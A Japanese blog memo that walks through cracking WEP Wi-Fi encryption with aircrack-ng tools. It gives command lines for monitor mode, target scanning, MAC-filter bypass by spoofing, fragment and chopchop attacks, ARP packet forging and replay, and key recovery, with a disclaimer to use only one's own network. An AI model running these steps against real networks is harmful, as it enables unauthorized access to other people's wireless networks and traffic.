読者です 読者をやめる 読者になる 読者になる

Carpe Diem

備忘録。https://github.com/jun06t

WEPクラック

※自分の管理下の環境で行ってください。そうでない場合は法により罰せられる可能性があります。 今回はWEPクラックのメモ。 せっかくBackTrackをいれたので、いくつかツールを試してみました。 ネットのやり方にはあまり載ってない注意点を主に書いて行こうかなぁと。 あと基本BackTrackでやってるので、素のUbuntuには以下のコマンドはありません。 WEPクラックの主な流れは以下です。 1、自分の無線をモニタモードにする 2、流れてる無線の電波を見る(ターゲット決め) 3、ターゲットからパケットを集める(一番重要?) 4、集めたパケットを元にWEPキーを解析する です。MacフィルタリングやSSIDをステルス化されてると作業が少し手間になります。 では以下詳細 ◆モニタモード まず自分の使ってる無線(インターフェース)を確認します。 ~# iwconfig wlan0     IEEE 802.11abgn  ESSID:"<hidden>"               Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated で、wlan0と名前が分かったら無線のモード変えます ~# airmon-ng start wlan0 こうすると最後の方に wlan0        Intel 5300AGN    iwlagn - [phy0]                 (monitor mode enabled on mon0) と出ます。このmon0がモニターモードのインターフェースです。 今後これをモニタリングにはこのmon0を使用します。 ◆無線の電波を見る まずは無差別で見ます。 ~# airodump-ng mon0 すると画面が切り替わって BSSID    PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH  ESSID                                                                                 <MacAd>  -87        3          0     0   4   54e  WEP  WEP            CG-Guest  <MacAd>  -88        3          0     0   4   54e  WPA2 CCMP   PSK   <length: 0>  <MacAd>  -90        3          0     0   9   54e  WEP  WEP            myLGN                                                                                 BSSID                STATION            PWR   Rate     Lost  Packets  Probes        <MacAddress>   <MacAddress>   -21   54e-54e     0        5             という感じに近くの無線の一覧がでます。下半分は無線につないでる一覧です。 ここでターゲット決めをするわけです。試すときは自分のルータでやってくださいね。 ※ESSIDが<length:12>などのようになっていたら正規のユーザが接続してくるまで待つ必要がある。 ターゲットを決めたら今度はその無線のみをモニタリングします。今回は仮の話で一番上のものとします。 かつログをとります。-wオプションでログをとれます。保存名称は何でもいいです。今回はlog --channelオプションは無線のチャンネル。上の一覧を参照すればいいです。これを指定しないと次のパケット収集で困るかも? --bssidオプションは対象のMacアドレスです。 ~# airodump-ng --channel 4 --bssid <MacAd> -w log mon0 すると今度はその無線しか見えなくなります。次に移ります。 ◆ターゲットからパケットを集める 一度ここでMacフィルタがかかっているかのチェック。 ~# aireplay-ng -1 0 -a <MacAd> -h 自機MACアドレス -e ESSID mon0 これでAssociation successfulなら大丈夫。DeAssociationならフィルタがかかっているのでMacアドレスを変更してください(一覧の下半分のつないでいる人を元に変更します)。(それでもだめな場合は、オープンシステム認証でなく共有鍵認証を用いています) さて確認が終わったら次へ。パケット集めです。 これは2通りあります。 ・周りが使っているのを利用する。(大勢の人が使ってる場合) ・周りに接続している人がいないため、自分で無理やりパケットを発生させる。パケットインジェクション ちなみに前者はまだ違反ではありませんが、後者は確実に違反になります。ただ手早くパケットを収集できるのは後者です。 そのままログが集まるのを待てばいいです。見るのは上の項目の中の「#Data」です。これが5000以上たまったら次の行動に移れます。 まぁ一応 ~# aireplay-ng -3 -b <MacAd> -h 自機MACアドレス mon0 をしてもいいのかな?でもこれをやったら違反かも。やらなくても利用者が多ければデータは集まります。 もし接続者が少なくて、#Dataが全然集まらない場合は自分で発生させる方法があります。後者です。やり方は2つあって ・fragment攻撃 ~# aireplay-ng -5 -b <MacAd> -h 自機MACアドレス mon0 ・chopchop攻撃 ~# aireplay-ng -4 -b <MacAd> -h 自機MACアドレス mon0 です。これらどちらかを使ってキーストリームを「.xorファイル」に保存し、xorファイルからarpリクエストパケットを生成します。 このarpリクエストパケットを使うと#Dataが一気に増えます。 試した所感としては、chopchop攻撃はほぼ確実にいけます。ただ場合によっては少し時間がかかる。fragment攻撃は成功率はまちまち。でもうまく行けばすぐ出来ます。 どちらもうまく行かない場合はDeAssociationの可能性があるので(associationは時間がたつと自動で解除されるので、定期的にassociationする必要がある)、次のコマンドを動かした状態でやってみるとうまく行きます。 ~# aireplay-ng -1 30 -a <MacAd> -h 自機MACアドレス -e ESSID mon0 さて戻りますが、xorファイルを保存できたら ~# packetforge-ng -0 -a BSSID -h 自機MACアドレス -k 255.255.255.255 -l 255.255.255.255 -y ???.xor -w 任意のファイル名(今回はpacとします) としてarpリクエストパケットを生成。 -kは宛先IPアドレス。上のように適当でOK。-lは送信元IPアドレス。同じく適当でOK。 -yは作成するためのキーストリーム。さっきの~.xorファイル。 ここまできたらもうほとんど成功みたいなものです。ではパケットを増やします。 ~# aireplay-ng -2 -r pac mon0 これを実行すると#Dataが急激に増えます。モニタで増えるのを確認できたら次に移ります。 ◆パケット集めてWEPキー解析 ログファイルは~.capと保存されているので ~# aircrack-ng ~.cap とすれば解析は始まります。解析が終了する間では、平行してログもとりつづけてください。 だいたい4~8万ほど#Dataは必要です。これくらい集まればほぼ確実に解析できます。 データが集まって解析が完了するとWEPキーが表示されます。お疲れ様でした。 あ、終わったらモニターモードを解除しておきましょう。 ~# airmon-ng stop mon0 以上です。 もちろんその他色々やり方、注意事項があるので自分でググりながら最適なやり方を見つけるといいと思います。